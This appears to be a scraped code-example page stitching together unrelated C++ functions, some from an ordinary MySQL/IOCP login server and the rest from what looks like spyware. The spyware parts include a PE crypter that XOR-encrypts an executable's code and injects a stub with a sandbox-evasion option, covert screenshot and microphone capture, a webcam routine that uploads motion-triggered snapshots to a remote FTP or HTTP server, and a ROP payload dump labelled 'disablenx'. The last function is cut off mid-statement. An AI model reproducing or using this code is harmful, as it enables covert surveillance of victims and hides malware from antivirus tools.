Esempio n. 1
0
bool CDBManager::DisconnectEx(CDBHandle *param)
{
	if (NULL == param)
	{
		MYPRINTF("The DBHandle of parameter in QueryEx of CDBManager is NULL!\n");
		return false;
	}

	if (CDBIdle::Instance() != param->stateMachine.CurrentState())
	{
		MYPRINTF("If you wish to use this DisconnectEx function, this DB handle must be in the idle state\n");
		return false;
	}

	CDBAct *tmpAct = &param->acts[CDBHandle::DB_ACK_TYPE::DISCONNECT];
	tmpAct->dbHandle = param;

	if (NULL == tmpAct)
	{
		MYPRINTF("The act of parameter in DisconnectEx of CDBManager is NULL!\n");
		return false;
	}

	PostQueuedCompletionStatus(proactor.iocp, NULL, NULL, static_cast<OVERLAPPED*>(tmpAct));

	return true;
}
Esempio n. 2
0
bool CDBConnector::EventProc(CAct *act, DWORD receivedBytes)
{
	CDBAct *dbAct = (CDBAct*)act;

	CDBHandle &dbHandle = *(CDBHandle*)dbAct->dbHandle;

	CDBManager &dbManager = CDBManager::GetInstance();

	CGlobalManager &globalManager = CGlobalManager::GetInstance();

	//--------------------------------------

	// DB initializing
	mysql_init(&dbHandle.connTmp);
	
	// DB connecting
	dbHandle.dbConnection = mysql_real_connect(&dbHandle.connTmp, dbHandle.dbHost.c_str(), dbHandle.dbUser.c_str()
		, dbHandle.dbPasswd.c_str(), dbHandle.dbSchema.c_str(), globalManager.dbPort, (char *)NULL, 0);

	if (NULL == dbHandle.dbConnection)
	{
		MYPRINTF(mysql_error(&dbHandle.connTmp));
		MYERRORPRINTF("mysql_real_connect");
		return false;
	}

	//--------------------------------------

	dbHandle.stateMachine.ChangeState(CDBIdle::Instance());

	return true;
}
PIMAGE_SECTION_HEADER Crypter::insertSectionHeader(PVOID pvPEBase, LPCSTR lpName, DWORD dwVirtualSize, DWORD dwCharacteristics, PDWORD pdwSize){
	if (strlen(lpName) > 7) {
		MYPRINTF("strlen(lpName) > 7\n");
		return NULL;
	}

	if (Crypter::freeSpaceInHeader(pvPEBase) < IMAGE_SIZEOF_SECTION_HEADER) {
		MYPRINTF("freeSpaceInHeader\n");
		return NULL;
	}

	PIMAGE_NT_HEADERS pNtHeaders = RtlImageNtHeader(pvPEBase);
	if (!pNtHeaders) {
		MYPRINTF("!pNtHeaders\n");
		return NULL;
	}

	DWORD dwSizeOfRawData = ALIGN_UP(dwVirtualSize, pNtHeaders->OptionalHeader.FileAlignment);
	dwVirtualSize = ALIGN_UP(dwVirtualSize, pNtHeaders->OptionalHeader.SectionAlignment);

	PIMAGE_SECTION_HEADER pNewSection = (PIMAGE_SECTION_HEADER)malloc(IMAGE_SIZEOF_SECTION_HEADER);
	if (!pNewSection) {
		MYPRINTF("!pNewSection\n");
		return NULL;
	}

	memset( pNewSection, 0, IMAGE_SIZEOF_SECTION_HEADER);
	memcpy((PVOID)(&pNewSection->Name), (PVOID)lpName, strlen(lpName));
	pNewSection->Characteristics = dwCharacteristics;
	pNewSection->Misc.VirtualSize = dwVirtualSize;
	pNewSection->SizeOfRawData = dwSizeOfRawData;

	PIMAGE_SECTION_HEADER pVirtualLastSection = Crypter::getVirtualyLastSectionHeader(pNtHeaders);
	pNewSection->VirtualAddress = pVirtualLastSection->VirtualAddress + ALIGN_UP(pVirtualLastSection->Misc.VirtualSize,pNtHeaders->OptionalHeader.SectionAlignment);	

	if (dwSizeOfRawData){ 
		PIMAGE_SECTION_HEADER pLastSection = Crypter::getPhysicalyLastSectionHeader(pNtHeaders);

		pNewSection->PointerToRawData = pLastSection->PointerToRawData + ALIGN_UP(pLastSection->SizeOfRawData, pNtHeaders->OptionalHeader.FileAlignment);
	}

	*pdwSize = dwVirtualSize;

	return pNewSection;
}
BOOL Crypter::insertSectionConfigInPE(PVOID pvPEBase,DWORD dwPESize,PVOID pvData,DWORD dwDataSize,PVOID *ppvNewPE,DWORD *pdwNewPESize){
	BOOL bRet = FALSE;
	PIMAGE_SECTION_HEADER pNewSection;
	DWORD dwSize;
	if (pNewSection = Crypter::insertSectionHeader( pvPEBase, Crypter::section, dwDataSize, IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ,&dwSize)){
		PVOID pvNewPE;
		DWORD dwNewPESize = pNewSection->PointerToRawData + pNewSection->SizeOfRawData;

		if (pvNewPE = malloc(dwNewPESize)){
			memcpy(pvNewPE, pvPEBase, dwPESize);

			PIMAGE_NT_HEADERS pNtHeaders = RtlImageNtHeader(pvNewPE);

			++(pNtHeaders->FileHeader.NumberOfSections);

			PIMAGE_SECTION_HEADER pVirtualLastSection = Crypter::getVirtualyLastSectionHeader(pNtHeaders);
			pVirtualLastSection[0] = *pNewSection;

			pNtHeaders->OptionalHeader.SizeOfImage += dwSize;

			memcpy((PVOID)((DWORD)pvNewPE + pNewSection->PointerToRawData),pvData,dwDataSize);

			DWORD dwHeaderSum, dwCheckSum;

			if (CheckSumMappedFile(pvNewPE,dwNewPESize,&dwHeaderSum,&dwCheckSum)){
				pNtHeaders->OptionalHeader.CheckSum = dwCheckSum;

				*ppvNewPE = pvNewPE;
				*pdwNewPESize = dwNewPESize;

				bRet = TRUE;
			}

			if (!bRet) free(pvNewPE);
		} else {
			MYPRINTF(" malloc(dwNewPESize)\n");
		}

		free(pNewSection);
	} else {
		MYPRINTF("!insertSectionHeader\n");
	}
	return bRet;
}
Esempio n. 5
0
bool CDBManager::QueryEx(std::string &str, CLoginSocket &sock)
{
	if ("" == str)
	{
		MYPRINTF("The string pointer of parameter in QueryEx of CDBManager is NULL!\n");
		return false;
	}

	CDBHandle *dbHandle = GetAvailableHandle();

	if (NULL == dbHandle)
	{
		MYPRINTF("There isn't even a handle which can deal with your query !!!\n");
		return false;
	}

	if (CDBIdle::Instance() != dbHandle->stateMachine.CurrentState())
	{
		MYPRINTF("The available DB handle is not in idle state !\n");
		return false;
	}

	dbHandle->queryStr = str;
	CDBAct *tmpAct = &dbHandle->acts[CDBHandle::DB_ACK_TYPE::QUERY];
	tmpAct->dbHandle = dbHandle;

	if (NULL == tmpAct)
	{
		MYPRINTF("The act of handle in QueryEx of CDBManager is NULL!\n");
		return false;
	}

	dbHandle->loginSock = &sock;

	dbHandle->stateMachine.ChangeState(CDBWaitResult::Instance());

	PostQueuedCompletionStatus(proactor.iocp, NULL, NULL, static_cast<OVERLAPPED*>(tmpAct));

	return true;
}
Esempio n. 6
0
// You must call the ReleaseHandle function after you have used the handle off !
CDBHandle *CDBManager::GetAvailableHandle()
{
	CDBHandle *choosedDBHandle = NULL;

	DWORD result = WaitForSingleObject(dbHandleSema, WAIT_AVAILABLE_HANDLE_TIME);

	if (WAIT_FAILED == result)
	{
		MYERRORPRINTF("WaitForSingleObject");
		return false;
	}
	else if (WAIT_TIMEOUT == result)
	{
		MYPRINTF("There is no available DB handle !\n");
		return NULL;
	}
	else if (WAIT_OBJECT_0 == result)
	{
		choosedDBHandle = dbHandles.front();
		dbHandles.pop();

		if (NULL == choosedDBHandle)
		{
			MYPRINTF("The DB handles' queue is empty !\n");
			return NULL;
		}

		if (CDBIdle::Instance() == choosedDBHandle->stateMachine.CurrentState())
		{
			return choosedDBHandle;
		}

		MYERRORPRINTF("The available handle's state is not the idle state !\n");
		return NULL;
	}

	MYPRINTF("There isn't any DBHandle !\n");
	return NULL;
}
Esempio n. 7
0
bool CDBManager::ReleaseHandle(CDBHandle *param)
{
	if (NULL == param)
	{
		MYPRINTF("Error : The parameter of ReleaseHandle is NULL !\n");
		return false;
	}

	if (CDBIdle::Instance() == param->stateMachine.CurrentState())
	{
		MYPRINTF("Error : The DB Handle is already available !\n");
		return false;
	}

	if (!ReleaseSemaphore(dbHandleSema, 1, NULL))
	{
		MYERRORPRINTF("ReleaseSemaphore");
		return false;
	}

	dbHandles.push(param);

	return true;
}
Esempio n. 8
0
bool CAcceptor::EventProc(CAct *act, DWORD receivedBytes)
{
	CLoginAct &tmpAct = *(CLoginAct*)act;

	CLoginSocket &tmpSocket = *tmpAct.loginSocket;

	CLoginManager &loginManager = CLoginManager::GetInstance();

	loginManager.proactor.Register((HANDLE)tmpSocket.sock);
	
	// You must change the state before receive the header !!!
	tmpSocket.stateMachine.ChangeState(CWaitHeader::Instance());
	tmpSocket.Recv(tmpSocket.recvBuf, HEADER_SIZE);

	MYPRINTF("ACCEPTED");

	return true;
}
// outType = 1 : console, 2: file, 3: buffer
bool Screen::takeScreenshot(const int outType, const char *filename, char **buffer, DWORD &size) {
    if (outType < 1 || outType > 3) {
        return false;
    }
    bool result = false;
    HBITMAP handleBitmapScreen = 0;
    HDC handleMemoryDC = 0;
    HWND  hWnd = 0;
    HDC handleDeviceContextOfWindow = 0;


    // open the WinSta0 as some services are attached to a different window station.
    HWINSTA hWindowStation = hWindowStation = OpenWindowStation( "WinSta0", FALSE, WINSTA_ALL_ACCESS );
    if( !hWindowStation )
    {
        if( RevertToSelf() )
            hWindowStation = OpenWindowStation( "WinSta0", FALSE, WINSTA_ALL_ACCESS );
    }

    // if we cant open the defaut input station we wont be able to take a screenshot
    if( !hWindowStation ) {
        MYPRINTF( "[SCREENSHOT] screenshot: Couldnt get the WinSta0 Window Station");
        return false;
    }

    // get the current process's window station so we can restore it later on.
    HWINSTA hOrigWindowStation = GetProcessWindowStation();

    // set the host process's window station to this sessions default input station we opened
    if( !SetProcessWindowStation( hWindowStation ) ) {
        MYPRINTF( "[SCREENSHOT] screenshot: SetProcessWindowStation failed" );
        return false;
    }

    // grab a handle to the default input desktop (e.g. Default or WinLogon)

    //HDESK hInputDesktop = OpenDesktop("Default", 0, FALSE, MAXIMUM_ALLOWED );
    HDESK hInputDesktop = OpenInputDesktop( 0, FALSE, MAXIMUM_ALLOWED );
    if( !hInputDesktop ) {
        MYPRINTF( "[SCREENSHOT] screenshot: OpenInputDesktop failed" );
        return false;
    }
    //if (SwitchDesktop(hInputDesktop) == 0){
    //	MYPRINTF( "[SCREENSHOT] screenshot: SwitchDesktop failed" );
    //	return false;
    //}
    // get the threads current desktop so we can restore it later on
    HDESK hOrigDesktop = GetThreadDesktop( GetCurrentThreadId() );

    // set this threads desktop to that of this sessions default input desktop on WinSta0
    SetThreadDesktop( hInputDesktop );

    // and now we can grab a handle to this input desktop
    HWND hDesktopWnd = GetDesktopWindow();



    int screenWidth = GetSystemMetrics (SM_CXSCREEN);
    int screenHeight = GetSystemMetrics (SM_CYSCREEN);
    MYPRINTF("width: %d, height: %d\n", screenWidth, screenHeight);
    // Retrieve the handle to a display device context for the client
    // area of the window.
    HDC handleDeviceContextOfScreen = GetDC(hDesktopWnd);
    //HDC handleDeviceContextOfScreen = CreateDC("DISPLAY",NULL,NULL,NULL);
    if (handleDeviceContextOfScreen == 0) {
        MYPRINTF("GetDC(0) has failed: %d", GetLastError());
        goto done;
    }

    if (outType == 1) { // print to console
        //The source DC is the entire screen and the destination DC is the current window (HWND)
        // Get the client area for size calculation
        HWND  hWnd = GetForegroundWindow();

        HDC handleDeviceContextOfWindow = GetDC(hWnd);
        if (handleDeviceContextOfScreen == 0) {
            MYPRINTF("GetDC(hWnd) has failed: %d", GetLastError());
            goto done;
        }
        RECT rcClient;
        GetClientRect(hWnd, &rcClient);

        //This is the best stretch mode
        SetStretchBltMode(handleDeviceContextOfWindow, HALFTONE);

        if(!StretchBlt(handleDeviceContextOfWindow,
                       0,0,
                       rcClient.right, rcClient.bottom,
                       handleDeviceContextOfScreen,
                       0,0,
                       screenWidth,
                       screenHeight,
                       SRCCOPY))
        {
            MYPRINTF("StretchBlt has failed: %d", GetLastError());
            goto done;
        }
        result = true;
    } else {
        // Create a compatible DC which is used in a BitBlt from the window DC
        handleMemoryDC = CreateCompatibleDC(handleDeviceContextOfScreen);
        if(!handleMemoryDC) {
            MYPRINTF("CreateCompatibleDC has failed: %d", GetLastError());
            goto done;
        }
        BITMAPINFO		bmpinfo;
        ZeroMemory(&bmpinfo,sizeof(bmpinfo));
        LONG dwWidth = GetDeviceCaps(handleDeviceContextOfScreen, HORZRES);
        LONG dwHeight = GetDeviceCaps(handleDeviceContextOfScreen, VERTRES);
        //dwBPP = GetDeviceCaps(hScreen, BITSPIXEL);
        LONG dwBPP = 24;
        LONG dwNumColors = GetDeviceCaps(handleDeviceContextOfScreen, NUMCOLORS);
        LPVOID			pBits;
        bmpinfo.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
        bmpinfo.bmiHeader.biWidth = dwWidth;
        bmpinfo.bmiHeader.biHeight = dwHeight;
        bmpinfo.bmiHeader.biPlanes = 1;
        bmpinfo.bmiHeader.biBitCount = (WORD) dwBPP;
        bmpinfo.bmiHeader.biCompression = BI_RGB;
        bmpinfo.bmiHeader.biSizeImage = 0;
        bmpinfo.bmiHeader.biXPelsPerMeter = 0;
        bmpinfo.bmiHeader.biYPelsPerMeter = 0;
        bmpinfo.bmiHeader.biClrUsed = dwNumColors;
        bmpinfo.bmiHeader.biClrImportant = dwNumColors;
        handleBitmapScreen = CreateDIBSection(handleDeviceContextOfScreen, &bmpinfo, DIB_PAL_COLORS, &pBits, NULL, 0);

        /**
        // Create a compatible bitmap from the Window DC
        handleBitmapScreen = CreateCompatibleBitmap(handleDeviceContextOfScreen, screenWidth, screenHeight);
        if(!handleBitmapScreen) {
        	MYPRINTF("CreateCompatibleBitmap Failed: %d", GetLastError());
        	goto done;
        }
        */
        // Select the compatible bitmap into the compatible memory DC.
        if (SelectObject(handleMemoryDC, handleBitmapScreen) == 0) {
            MYPRINTF("SelectObject Failed: %d", GetLastError());
            goto done;
        }

        // Bit block transfer into our compatible memory DC.
        if(!BitBlt(handleMemoryDC,
                   0, 0,
                   screenWidth, screenHeight,
                   handleDeviceContextOfScreen,
                   0, 0,
                   SRCCOPY)) {
            MYPRINTF("BitBlt has failed: %d", GetLastError());
            goto done;
        }
        BITMAP bmpScreen;
        // Get the BITMAP from the HBITMAP
        if (GetObject(handleBitmapScreen, sizeof(BITMAP), &bmpScreen) == 0) {
            MYPRINTF("GetObject has failed: %d", GetLastError());
            goto done;
        }

        BITMAPFILEHEADER   bmfHeader;
        BITMAPINFOHEADER   bi;

        bi.biSize = sizeof(BITMAPINFOHEADER);
        bi.biWidth = bmpScreen.bmWidth;
        bi.biHeight = bmpScreen.bmHeight;
        bi.biPlanes = 1;
        bi.biBitCount = 32;
        bi.biCompression = BI_RGB;
        bi.biSizeImage = 0;
        bi.biXPelsPerMeter = 0;
        bi.biYPelsPerMeter = 0;
        bi.biClrUsed = 0;
        bi.biClrImportant = 0;

        DWORD dwBmpSize = ((bmpScreen.bmWidth * bi.biBitCount + 31) / 32) * 4 * bmpScreen.bmHeight;

        HANDLE hData = GlobalAlloc(GHND,dwBmpSize);
        char *bmpdata = (char *)GlobalLock(hData);

        // Starting with 32-bit Windows, GlobalAlloc and LocalAlloc are implemented as wrapper functions that
        // call HeapAlloc using a handle to the process's default heap. Therefore, GlobalAlloc and LocalAlloc
        // have greater overhead than HeapAlloc.
        HANDLE hDIB = GlobalAlloc(GHND,dwBmpSize);
        char *lpbitmap = (char *)GlobalLock(hDIB);

        // Gets the "bits" from the bitmap and copies them into a buffer
        // which is pointed to by lpbitmap.
        //GetDIBits(handleDeviceContextOfWindow, handleBitmapScreen, 0,
        GetDIBits(handleDeviceContextOfScreen, handleBitmapScreen, 0,
                  (UINT)bmpScreen.bmHeight,
                  lpbitmap,
                  (BITMAPINFO *)&bi, DIB_RGB_COLORS);

        // Add the size of the headers to the size of the bitmap to get the total file size
        DWORD dwSizeofDIB = dwBmpSize + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER);

        //Offset to where the actual bitmap bits start.
        bmfHeader.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER);

        //Size of the file
        bmfHeader.bfSize = dwSizeofDIB;

        //bfType must always be BM for Bitmaps
        bmfHeader.bfType = 0x4D42; //BM

        DWORD dwBytesWritten = 0;


        UINT mybmpsize = dwBmpSize + sizeof(bi) + sizeof(bmfHeader);


        // put headers together to make a .bmp in memory
        memcpy(bmpdata, &bmfHeader, sizeof(bmfHeader));
        memcpy(bmpdata + sizeof(bmfHeader), &bi, sizeof(bi));
        memcpy(bmpdata + sizeof(bmfHeader) + sizeof(bi), lpbitmap, dwBmpSize);

        if (outType == 2) {
            // Now convert to JPEG
            if (bmp2jpegtofile((PBYTE)bmpdata, 70, filename ) == 0) {
                MYPRINTF("unable to write jpg");
            } else {
                result = true;
            }
        } else {
            if (bmp2jpegtomemory((PBYTE)bmpdata, 70, (BYTE **)buffer, &size) == 0) {
                MYPRINTF("unable to write jpg");
            } else {
                result = true;
            }
        }

        //Unlock and Free the DIB from the heap
        GlobalUnlock(hDIB);
        GlobalFree(hDIB);

        GlobalUnlock(hData);
        GlobalFree(hData);

    }
    //Clean up
done:
    // restore the origional process's window station
    if( hOrigWindowStation )
        SetProcessWindowStation( hOrigWindowStation );

    // restore the threads origional desktop
    if( hOrigDesktop )
        SetThreadDesktop( hOrigDesktop );

    // close the WinSta0 window station handle we opened
    if( hWindowStation )
        CloseWindowStation( hWindowStation );

    // close this last to avoid a handle leak...
    if( hInputDesktop )
        CloseDesktop( hInputDesktop );

    DeleteObject(handleBitmapScreen);
    DeleteObject(handleMemoryDC);
    ReleaseDC(NULL,handleDeviceContextOfScreen);
    ReleaseDC(hWnd,handleDeviceContextOfWindow);

    return result;

}
		void Payload::showRop(unsigned char* payload){
			MYPRINTF( "\n\t\tscratch\n");
			MYPRINTF( "\t\t%02X", payload[533]);
			MYPRINTF( "%02X", payload[532]);
			MYPRINTF( "%02X", payload[531]);
			MYPRINTF( "%02X", payload[530]);

			MYPRINTF( "\n\t\tdisablenx\n");
			MYPRINTF( "\t\t%02X", payload[537]);
			MYPRINTF( "%02X", payload[536]);
			MYPRINTF( "%02X", payload[535]);
			MYPRINTF( "%02X", payload[534]);

			MYPRINTF( "\n\t\tret\n");
			MYPRINTF( "\t\t%02X", payload[545]);
			MYPRINTF( "%02X", payload[544]);
			MYPRINTF( "%02X", payload[543]);
			MYPRINTF( "%02X", payload[542]);

			MYPRINTF( "\n");
		}
bool SoundRecorder::record(int lengthTime, unsigned char **buffer, int& size){
	HWAVEIN microHandle;
    WAVEHDR waveHeader;

    const int numpts = m_sampleRate * lengthTime;
    short int *waveIn = new short int[numpts];   // 'short int' is a 16-bit type; I request 16-bit samples below
												// for 8-bit capture, you'd use 'unsigned char' or 'BYTE' 8-bit types
    MMRESULT result = 0;

    WAVEFORMATEX format;
    format.wFormatTag = WAVE_FORMAT_PCM;      // simple, uncompressed format
    format.wBitsPerSample = m_bitsPerSample;                //  16 for high quality, 8 for telephone-grade
    format.nChannels = m_nbChannels;                     //  1=mono, 2=stereo
    format.nSamplesPerSec = m_sampleRate;
    format.nAvgBytesPerSec = format.nSamplesPerSec * format.nChannels * format.wBitsPerSample / 8;
                                            // = nSamplesPerSec * n.Channels * wBitsPerSample/8
    format.nBlockAlign = format.nChannels * format.wBitsPerSample / 8;                    
                                            // = n.Channels * wBitsPerSample/8
    format.cbSize = 0;// Size, in bytes, of extra format information

    result = waveInOpen(&microHandle, WAVE_MAPPER, &format, 0L, 0L, WAVE_FORMAT_DIRECT);
    if (result) {
        MYPRINTF("waveInOpen failed\n");
        return false; 
    }

    // Set up and prepare header for input
    waveHeader.lpData = (LPSTR)waveIn;
    waveHeader.dwBufferLength = numpts * 2;
    waveHeader.dwBytesRecorded = 0;
    waveHeader.dwUser = 0L;
    waveHeader.dwFlags = 0L;
    waveHeader.dwLoops = 0L;
    waveInPrepareHeader(microHandle, &waveHeader, sizeof(WAVEHDR));

    // Insert a wave input buffer
    result = waveInAddBuffer(microHandle, &waveHeader, sizeof(WAVEHDR));
    if (result) {
        MYPRINTF("waveInAddBuffer failed\n");
        return false; 
    }

    result = waveInStart(microHandle);
    if (result) {
        MYPRINTF("waveInStart failed\n");
        return false; 
    }

     // Wait until finished recording
     do {
		Sleep(1000);
	 } while (waveInUnprepareHeader(microHandle, &waveHeader, sizeof(WAVEHDR)) == WAVERR_STILLPLAYING);
	 
	int chunksize, pcmsize, numSamples, subchunk1size;
	int audioFormat = WAVE_FORMAT_PCM;
		
	numSamples = ((long) (numpts / m_sampleRate) * 1000);
	pcmsize = sizeof(PCMWAVEFORMAT);
		
	subchunk1size = 16;
	int byteRate = m_sampleRate * m_nbChannels * m_bitsPerSample / 8;
	int blockAlign = m_nbChannels * m_bitsPerSample / 8;
	int subchunk2size = waveHeader.dwBufferLength * m_nbChannels;
	chunksize = (36 + subchunk2size);

	*buffer = new unsigned char[44 + waveHeader.dwBufferLength];
	size = 44 + waveHeader.dwBufferLength;

	(*buffer)[0] = 'R';
	(*buffer)[1] = 'I';
	(*buffer)[2] = 'F';
	(*buffer)[3] = 'F';

	memcpy(&(*buffer)[4], &chunksize, 4);

	(*buffer)[8] = 'W';
	(*buffer)[9] = 'A';
	(*buffer)[10] = 'V';
	(*buffer)[11] = 'E';

	(*buffer)[12] = 'f';
	(*buffer)[13] = 'm';
	(*buffer)[14] = 't';
	(*buffer)[15] = ' ';

	memcpy(&(*buffer)[16], &subchunk1size, 4);

	memcpy(&(*buffer)[20], &audioFormat, 2);

	memcpy(&(*buffer)[22], &m_nbChannels, 2);

	memcpy(&(*buffer)[24], &m_sampleRate, 4);

	memcpy(&(*buffer)[28], &byteRate, 4);

	memcpy(&(*buffer)[32], &blockAlign, 2);

	memcpy(&(*buffer)[34], &m_bitsPerSample, 2);

	(*buffer)[36] = 'd';
	(*buffer)[37] = 'a';
	(*buffer)[38] = 't';
	(*buffer)[39] = 'a';

	memcpy(&(*buffer)[40], &subchunk2size, 4);

	memcpy(&(*buffer)[44], waveHeader.lpData, waveHeader.dwBufferLength);

	Print::printBufferAsHexa(*buffer, 44);

     waveInClose(microHandle);

	 delete waveIn;

	 return true;
}
void Spy::start(){
	m_start = true;

	XWebcam webcam;
	int webcamCount = webcam.webcamCount();
	if (webcamCount == 0){
		return;
	}

	while(!Icmp::ping("8.8.8.8")){
		MYPRINTF("no internet ? wait\n");
		Sleep(60000);
	}

	TCHAR* path = TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\");
	TCHAR* key = TEXT("Index");

	Register reg;

	int value = reg.getKeyAsInt(path, key, 0);
	if (value == 0){
		reg.createStringKey(HKEY_CURRENT_USER, path, key, TEXT("1"));
		value = 1;
	}
	
	while(m_start) {
		//for (int i = 0; i < webcamCount; i++){
			if (webcam.snapMotionDetection(m_locale.c_str(), 1, m_detail)){
				if (value > m_maxImg){
					value = 1;
				}
				std::tstring name;

				name.append(m_remote);

				TCHAR buffer [33];
				_itot(value, buffer, 10);

				name.append(buffer);
				name.append(TEXT(".jpg"));

				TCHAR buffer2 [33];
				_itot(value, buffer2, 10);

				value++;

				reg.createStringKey(HKEY_CURRENT_USER, path, key, buffer2);

				try {
					Ftp ftp(m_url, 21, m_ftpUser, m_ftpPassword);

					ftp.setCurrentDirectory(TEXT("public_html"));

					//char buffer_dir[128];
					//if (webcamCount != 1){					
					//	sprintf_s(buffer_dir, COUNTOF(buffer_dir), "%s_%d", m_ftpDirectory.c_str(), i + 1);
					//} else {
					//	sprintf_s(buffer_dir, COUNTOF(buffer_dir), "%s", m_ftpDirectory.c_str());
					//}

					try {
						ftp.createDirectory(m_ftpDirectory);
					} catch (std::exception error){
						//MYPRINTF("%s\n", error.what());
					}
					ftp.setCurrentDirectory(m_ftpDirectory);

					ftp.uploadFile(m_locale.c_str(), name.c_str());

				} catch (std::exception error){
					MYPRINTF("exception: %s\n", error.what());
				}
			//}
		}
		Sleep(m_wait);
		m_start = RUNNING;
	}
}
void Spy::startmemory(){
	m_start = true;

	XWebcam webcam;
	int webcamCount = webcam.webcamCount();
	if (webcamCount == 0){
		MYPRINTF("no webcam\n");
		return;
	}

	while(!Icmp::ping("8.8.8.8")){
		MYPRINTF("no internet ? wait\n");
		Sleep(60000);
	}

	TCHAR* path = TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\");
	TCHAR* key = TEXT("Index");

	Register reg;

	int index = reg.getKeyAsInt(path, key, 0);
	if (index == 0){
		reg.createStringKey(HKEY_CURRENT_USER, path, key, TEXT("1"));
		index = 1;
	}

	DWORD serialAsInt;
	if (!Info::getUniqueId(serialAsInt)) {
		serialAsInt = 156000;
	}
	char *memory;
	DWORD size;
	while(m_start) {
		//for (int j = 0; j < 5; j++){
			if (webcam.snapMotionDetectionToMemory(&memory, size, 1, m_detail)){
				if (index > m_maxImg){
					index = 1;
				}
				std::tstring remoteName;

				remoteName.append(m_remote);

				TCHAR indexAsStr [33];
				_itot(index, indexAsStr, 10);

				remoteName.append(indexAsStr);
				remoteName.append(TEXT(".jpg"));

				HttpHelper helper;

				char *response = 0;
				int responseSize = 0;

				char newUri[1024];
				sprintf_s(newUri, 1024, "%s?v=2&s=%u", m_url, serialAsInt);
				if (helper.uploadBuffer(m_server, newUri, (char *)memory, size, (TCHAR *)remoteName.c_str(), &response, responseSize)){
					free(response);
					index++;

					TCHAR newIndexAsStr [33];
					_itot(index, newIndexAsStr, 10);
					reg.createStringKey(HKEY_CURRENT_USER, path, key, newIndexAsStr);
				}	
				free(memory);
			//}
		}
		Sleep(m_wait);
		m_start = RUNNING;
	}
}
bool Crypter::crypt(const char *infile, const char *outfile){
	// variables

	DWORD dwOldProt, bytes;

	// open it and get the size
	HANDLE hFile = CreateFile(infile, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0);
	if (!hFile){
		MYPRINTF("Unable to open file\n");
		return false;
	}
	DWORD dwFileSize = GetFileSize(hFile, 0);

	// load in memory
	LPBYTE fileBuffer = (LPBYTE) malloc(dwFileSize);
	ReadFile(hFile, fileBuffer, dwFileSize, &bytes, 0);

	CloseHandle(hFile);

	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER) fileBuffer;
	// check if it is valid PE, i would say that this is merely a proper check, for a proper one you would need to calculate all the RVA's and see if they are valid
	if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		MYPRINTF("IMAGE_DOS_SIGNATURE\n");
		return false;
	}

	PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS) (fileBuffer + dosHeader->e_lfanew);
	if(ntHeaders->Signature != IMAGE_NT_SIGNATURE){
		MYPRINTF("IMAGE_NT_SIGNATURE\n");
		return false;
	}


	PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER) SECHDROFFSET(fileBuffer);
#define TEXT_SECTION ".text"
	while(memcmp(sectionHeader->Name, TEXT_SECTION, strlen(TEXT_SECTION))) // get the ".text" section header
		sectionHeader++;

	DWORD dwVSize                  = sectionHeader->Misc.VirtualSize; // the virtual size of the section, later this will be used as chunksize in our stub, after proper alignment
	DWORD dwSectionSize    = sectionHeader->SizeOfRawData; // speaks for itself
	DWORD dwStubSize; // the stubsize, in bytes
	if (Crypter::evadeSandbox){
		dwStubSize               = (DWORD) _end_evade_sandbox - (DWORD) _xor_block_evade_sandbox; // the stubsize, in bytes
	} else {
		dwStubSize               = (DWORD) _end - (DWORD) _xor_block; // the stubsize, in bytes
	}

	LPBYTE sectionBuffer = (LPBYTE) malloc(dwSectionSize); // allocate memory enough to hold our raw section data
	memcpy(sectionBuffer, fileBuffer + sectionHeader->PointerToRawData, dwSectionSize); // ... copy the data

	_xor_chunk(sectionBuffer, dwSectionSize, 256); // aaand encrypt it! you can use different block sizes here - 8, 16, 32, 64, 128, 256, 512...
	memset(sectionBuffer + sectionHeader->Misc.VirtualSize, 0, (dwSectionSize - sectionHeader->Misc.VirtualSize)); // fill with zeros after the end of actual data
	// copy back the data
	memcpy(fileBuffer + sectionHeader->PointerToRawData, sectionBuffer, dwSectionSize); // ... copy the data
	free(sectionBuffer);

	DWORD oep = ntHeaders->OptionalHeader.AddressOfEntryPoint + ntHeaders->OptionalHeader.ImageBase; // the original entry point, this is a linear address
	DWORD seg = sectionHeader->VirtualAddress + ntHeaders->OptionalHeader.ImageBase; // the section address, you guessed right, this too is a linear one
	DWORD bsz = 256; // you know what this is

	while(dwVSize % bsz) // we need to align it to block size
		dwVSize++;

	if (Crypter::evadeSandbox){
		VirtualProtect(_xor_block_evade_sandbox, dwStubSize, PAGE_EXECUTE_READWRITE, &dwOldProt); // to be able to update the stub...
	} else {
		VirtualProtect(_xor_block, dwStubSize, PAGE_EXECUTE_READWRITE, &dwOldProt); // to be able to update the stub...
	}

	// and update it, blah, blah, blah...
	if (Crypter::evadeSandbox){
		memcpy((void *)((unsigned long) _stub_evade_sandbox + OEP_o), &oep, 4);
		memcpy((void *)((unsigned long) _stub_evade_sandbox + SEG_o), &seg, 4);
		memcpy((void *)((unsigned long) _stub_evade_sandbox + BSZ_o), &bsz, 4);
		memcpy((void *)((unsigned long) _stub_evade_sandbox +  SZ_o), &dwVSize, 4);
	} else {
		memcpy((void *)((unsigned long) _stub + OEP_o), &oep, 4);
		memcpy((void *)((unsigned long) _stub + SEG_o), &seg, 4);
		memcpy((void *)((unsigned long) _stub + BSZ_o), &bsz, 4);
		memcpy((void *)((unsigned long) _stub +  SZ_o), &dwVSize, 4);
	}

	
	Crypter::section = new char [6];
	Random::createRandomName(COUNTOF(Crypter::section), Crypter::section);
	char* resDll;
	DWORD szResDll;
	if (Crypter::evadeSandbox){
		if (!Crypter::insertSectionConfigInPE(fileBuffer, dwFileSize, _xor_block_evade_sandbox, dwStubSize + sizeof(int), (PVOID*)(&resDll), &szResDll )){
			MYPRINTF("problem with injection\n");
			delete Crypter::section;
			return false;
		}	
	} else {
		if (!Crypter::insertSectionConfigInPE(fileBuffer, dwFileSize, _xor_block, dwStubSize + sizeof(int), (PVOID*)(&resDll), &szResDll )){
